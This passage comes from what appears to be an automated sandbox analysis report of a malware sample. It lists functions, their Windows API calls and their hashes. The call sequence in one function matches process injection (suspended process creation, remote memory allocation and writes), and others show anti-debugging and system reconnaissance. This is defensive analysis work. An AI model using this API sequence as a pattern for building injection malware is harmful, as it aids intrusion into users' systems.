                                                    • Part of subcall function 0321F4B0: RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 0321F592
                                                    • Part of subcall function 0321F4B0: RegCloseKey.KERNELBASE(80000002), ref: 0321F5A8
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 032067BD
                                                    • Part of subcall function 032061F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 03206894
                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00020CF0,00000000,00000000,00000000), ref: 03220D90
                                                  • Sleep.KERNELBASE(00007530), ref: 03220DA5
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: CreateErrorLastOpenSleep$CloseInfoMutexQueryThread
                                                  • String ID:
                                                  • API String ID: 2150463253-0
                                                  • Opcode ID: 176b4a178ee8b0c706ce2b2652ec9d56fefb726450e943c666d69f6278037816
                                                  • Instruction ID: 88779dc935694c6333c0133d6af75baa005dcf645cd726222c9cc608a6325546
                                                  • Opcode Fuzzy Hash: 176b4a178ee8b0c706ce2b2652ec9d56fefb726450e943c666d69f6278037816
                                                  • Instruction Fuzzy Hash: 9EE086396F432477E220B7A15D0AB5D3D449B14B51F544200A7192D0C29DE435E045EB
                                                  Function 0320B250 Relevance: 1.7, APIs: 1, Instructions: 169COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3991 320b250-320b2dc GetComputerNameExW 3992 320b2e0-320b2e9 3991->3992 3992->3992 3993 320b2eb-320b2f2 3992->3993 3994 320b2f4-320b323 call 322b0d0 3993->3994 3995 320b325-320b32b 3993->3995 4005 320b395-320b3f7 call 3223010 3994->4005 3997 320b331-320b33c 3995->3997 3998 320b4ab call 32026a0 3995->3998 4001 320b345-320b34c 3997->4001 4002 320b33e-320b343 3997->4002 4004 320b4b0-320b4b5 call 322f02c 3998->4004 4003 320b34f-320b38f call 32256e0 call 322b0d0 4001->4003 4002->4003 4003->4005 4013 320b451-320b45a 4005->4013 4014 320b3f9 4005->4014 4015 320b45c-320b471 4013->4015 4016 320b48d-320b4aa call 32299c0 4013->4016 4018 320b400-320b41d 4014->4018 4019 320b483-320b48a call 322a036 4015->4019 4020 320b473-320b481 4015->4020 4025 320b421-320b44f 4018->4025 4026 320b41f 4018->4026 4019->4016 4020->4004 4020->4019 4025->4013 4025->4018 4026->4025
                                                  APIs
                                                  • GetComputerNameExW.KERNEL32(00000002,?,?,74D40A26,774D0F00), ref: 0320B2A6
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ComputerName
                                                  • String ID:
                                                  • API String ID: 3545744682-0
                                                  • Opcode ID: 7a4c56a5a02b8f3467acdf78a7a6f79a98b48e8b755c843950a09f9cc817ca89
                                                  • Instruction ID: 4544553209e309fdc2a483993daeeedab48fdd8c587c4d3787d76e4947672598
                                                  • Opcode Fuzzy Hash: 7a4c56a5a02b8f3467acdf78a7a6f79a98b48e8b755c843950a09f9cc817ca89
                                                  • Instruction Fuzzy Hash: 5D518E759112299BCB20DF68DC88BDDB7B8AB58310F1406D9D819A7291DB74ABC4CF90
                                                  Function 03230632 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 5806a22f12cb4afe1abbd2cb36b595270268b3ae57944d2dda9f9ec6912ba8be
                                                  • Instruction ID: 02cd8ea6a224e3a3b2778142850ebce76bb5ff0279ce6296daea34a6da669147
                                                  • Opcode Fuzzy Hash: 5806a22f12cb4afe1abbd2cb36b595270268b3ae57944d2dda9f9ec6912ba8be
                                                  • Instruction Fuzzy Hash: 3701A7B2C24319BEDF01EFA89C017DD7FF4AF85210F148166E819EA1D4EAB086C4DB95
                                                  Function 03220CF0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 032061F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,74D40A26,74D40A26), ref: 0320639C
                                                    • Part of subcall function 032061F0: RegQueryValueExA.KERNELBASE(74D40A26,?,00000000,00000000,?,00000400,?,?,00000000,00000001,74D40A26,74D40A26), ref: 032063CA
                                                    • Part of subcall function 032061F0: RegCloseKey.KERNELBASE(74D40A26,?,?,00000000,00000001,74D40A26,74D40A26), ref: 032063D6
                                                  • Sleep.KERNELBASE ref: 03220D75
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQuerySleepValue
                                                  • String ID:
                                                  • API String ID: 4119054056-0
                                                  • Opcode ID: 53db4406d94b540dc30c6b092d3bb5581100c730703f67301bcbb16733aac183
                                                  • Instruction ID: 9c4bb435836f29d604375ef3409e060ce749b5d848210b45335f58dbf1509303
                                                  • Opcode Fuzzy Hash: 53db4406d94b540dc30c6b092d3bb5581100c730703f67301bcbb16733aac183
                                                  • Instruction Fuzzy Hash: 2CF0A479A20714BBC700FB6CDD06B0DBFB4EB06A60F444358E8216B3D7EAB51A5447D2

                                                  Non-executed Functions

                                                  Function 032293ED Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 032293F3
                                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 03229401
                                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 03229412
                                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 03229423
                                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 03229434
                                                  • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 03229445
                                                  • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 03229456
                                                  • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 03229467
                                                  • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 03229478
                                                  • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 03229489
                                                  • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0322949A
                                                  • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 032294AB
                                                  • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 032294BC
                                                  • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 032294CD
                                                  • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 032294DE
                                                  • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 032294EF
                                                  • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 03229500
                                                  • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 03229511
                                                  • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 03229522
                                                  • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 03229533
                                                  • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 03229544
                                                  • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 03229555
                                                  • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 03229566
                                                  • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 03229577
                                                  • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 03229588
                                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 03229599
                                                  • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 032295AA
                                                  • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 032295BB
                                                  • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 032295CC
                                                  • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 032295DD
                                                  • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 032295EE
                                                  • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 032295FF
                                                  • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 03229610
                                                  • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 03229621
                                                  • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 03229632
                                                  • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 03229643
                                                  • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 03229654
                                                  • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 03229665
                                                  • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 03229676
                                                  • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 03229687
                                                  • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 03229698
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$HandleModule
                                                  • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                  • API String ID: 667068680-295688737
                                                  • Opcode ID: 40f4a6d827ba6232ce68cf3bac88895ce5833e7b926e2d352a634f9d2aa61b2e
                                                  • Instruction ID: 539d9f47b2b7cec02eb1377aa30356c7759717164964a889d8449c4037191103
                                                  • Opcode Fuzzy Hash: 40f4a6d827ba6232ce68cf3bac88895ce5833e7b926e2d352a634f9d2aa61b2e
                                                  • Instruction Fuzzy Hash: 8E61A9729A6360FFCF00BFB5B80DA5E3AA8BE09652314C81AF911D254DD7F462908F95
                                                  Function 03208070 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 121memoryprocessthreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0320809D
                                                  • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 032080FB
                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 03208114
                                                  • GetThreadContext.KERNEL32(?,00000000), ref: 03208129
                                                  • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 03208149
                                                  • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0320818B
                                                  • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 032081A8
                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 03208261
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
                                                  • String ID: $VUUU$invalid stoi argument
                                                  • API String ID: 3796053839-3954507777
                                                  • Opcode ID: b33ae9abb80c62f23786bdff205f1b7ae8196a3eaceacc7b25d548e3680472eb
                                                  • Instruction ID: bdd7d3d91fb87be20e6de46c389dc09da44d9a6da242c6bcecf94196624ccd3b
                                                  • Opcode Fuzzy Hash: b33ae9abb80c62f23786bdff205f1b7ae8196a3eaceacc7b25d548e3680472eb
                                                  • Instruction Fuzzy Hash: AF417F71654341BFD720DB61EC09FA6BBE8BF88B10F004419BA84E61D0D7B0A594CB96
                                                  Function 03242126 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 03236DD0: GetLastError.KERNEL32(00000000,00000000,?,03237BB7,?,00000000,00000000,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010), ref: 03236DD5
                                                    • Part of subcall function 03236DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010,03231112,00000000,00000000,00000000), ref: 03236E73
                                                  • GetACP.KERNEL32(?,?,?,?,?,?,032351D7,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 032421E7
                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,032351D7,?,?,?,00000055,?,-00000050,?,?), ref: 03242212
                                                  • _wcschr.LIBVCRUNTIME ref: 032422A6
                                                  • _wcschr.LIBVCRUNTIME ref: 032422B4
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 03242375
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                  • String ID: utf8
                                                  • API String ID: 4147378913-905460609
                                                  • Opcode ID: 4ebf26292a8a1fa0574f198958b0dab56d931511359d9df50151a4240f50ab91
                                                  • Instruction ID: dba757658a9c66f916d837de6903a4e410a21bfdcc539616f551a0f2ec65d700
                                                  • Opcode Fuzzy Hash: 4ebf26292a8a1fa0574f198958b0dab56d931511359d9df50151a4240f50ab91
                                                  • Instruction Fuzzy Hash: FE71D975620306EAD72DEB36DC45BAAB7ACEF45700F144866F505DB181FBB0E9C08761
                                                  Function 03244347 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1427COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                  • API String ID: 4168288129-2761157908
                                                  • Opcode ID: d956e1cd944ccf22fc2939797c9196d0e9c2c1eb7d04dcc7bf149c219e046ddc
                                                  • Instruction ID: aadb54dc6a05f7bf1a253b228c3dc59cc3144864e826fa8794a7e1722e1ed574
                                                  • Opcode Fuzzy Hash: d956e1cd944ccf22fc2939797c9196d0e9c2c1eb7d04dcc7bf149c219e046ddc
                                                  • Instruction Fuzzy Hash: E3D26C71E282298FDB69DE29DD407EAB7B9EB45304F1841EAD44DE7240E774AEC08F41
                                                  Function 032428B2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,03242BD0,00000002,00000000,?,?,?,03242BD0,?,00000000), ref: 0324294B
                                                  • GetLocaleInfoW.KERNEL32(?,20001004,03242BD0,00000002,00000000,?,?,?,03242BD0,?,00000000), ref: 03242974
                                                  • GetACP.KERNEL32(?,?,03242BD0,?,00000000), ref: 03242989
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: ACP$OCP
                                                  • API String ID: 2299586839-711371036
                                                  • Opcode ID: 990a80fe0c9971280584d2df0816587c79cfe8cf73f7b9b9a06d8f4ccbae10d3
                                                  • Instruction ID: bdfd870272431d08598e2e92346f61806580c6113cd216749edfde04a1570d3e
                                                  • Opcode Fuzzy Hash: 990a80fe0c9971280584d2df0816587c79cfe8cf73f7b9b9a06d8f4ccbae10d3
                                                  • Instruction Fuzzy Hash: 9321C932A30306D6DB3CCF16D504B9BF3AAAB44E54B6E88A4F906D7104E772D9C1C750
                                                  Function 03242A87 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 03236DD0: GetLastError.KERNEL32(00000000,00000000,?,03237BB7,?,00000000,00000000,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010), ref: 03236DD5
                                                    • Part of subcall function 03236DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010,03231112,00000000,00000000,00000000), ref: 03236E73
                                                    • Part of subcall function 03236DD0: _free.LIBCMT ref: 03236E32
                                                    • Part of subcall function 03236DD0: _free.LIBCMT ref: 03236E68
                                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 03242B93
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 03242BDC
                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 03242BEB
                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 03242C33
                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 03242C52
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                  • String ID:
                                                  • API String ID: 949163717-0
                                                  • Opcode ID: 4ba6dd9f771bc8b90a41c03b183a3f48e512e75237b8d2691bac510986fa39c0
                                                  • Instruction ID: 70fa974b53d84bbb341b30a6b4ad928f015601cc457f767d51ceddc22b56d3c5
                                                  • Opcode Fuzzy Hash: 4ba6dd9f771bc8b90a41c03b183a3f48e512e75237b8d2691bac510986fa39c0
                                                  • Instruction Fuzzy Hash: E8516271920316EEDB15EFA6DC44BBEB7B8EF44700F094865F911EB140EBB09A84CB61
                                                  Function 0322A4A5 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0322A4B1
                                                  • IsDebuggerPresent.KERNEL32 ref: 0322A57D
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0322A59D
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0322A5A7
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                  • String ID:
                                                  • API String ID: 254469556-0
                                                  • Opcode ID: d0a69b3d0b4f935a70489a3e6dd4553e65a505cef56e02fb96f7b7c302601018
                                                  • Instruction ID: 6d4c7eacf08de9aa6f53f5be1d9be67b5f1e8e36f8a2cde1898a1ed3646399b3
                                                  • Opcode Fuzzy Hash: d0a69b3d0b4f935a70489a3e6dd4553e65a505cef56e02fb96f7b7c302601018
                                                  • Instruction Fuzzy Hash: A8310975D113299BDF10EFA4D989BCDBBB8AF08704F10419AE40DAB240EB719B848F45
                                                  Function 03242539 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 03236DD0: GetLastError.KERNEL32(00000000,00000000,?,03237BB7,?,00000000,00000000,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010), ref: 03236DD5
                                                    • Part of subcall function 03236DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010,03231112,00000000,00000000,00000000), ref: 03236E73
                                                    • Part of subcall function 03236DD0: _free.LIBCMT ref: 03236E32
                                                    • Part of subcall function 03236DD0: _free.LIBCMT ref: 03236E68
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0324258D
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 032425D7
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0324269D
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: InfoLocale$ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 3140898709-0
                                                  • Opcode ID: a52e1c18a030e66389b6488386b7165f8401bc92a4955b877291cae89751846b
                                                  • Instruction ID: 6bc185d316fcb4f1574a308851fa4009665a6dbcc7021e2629201e3a0db10b42
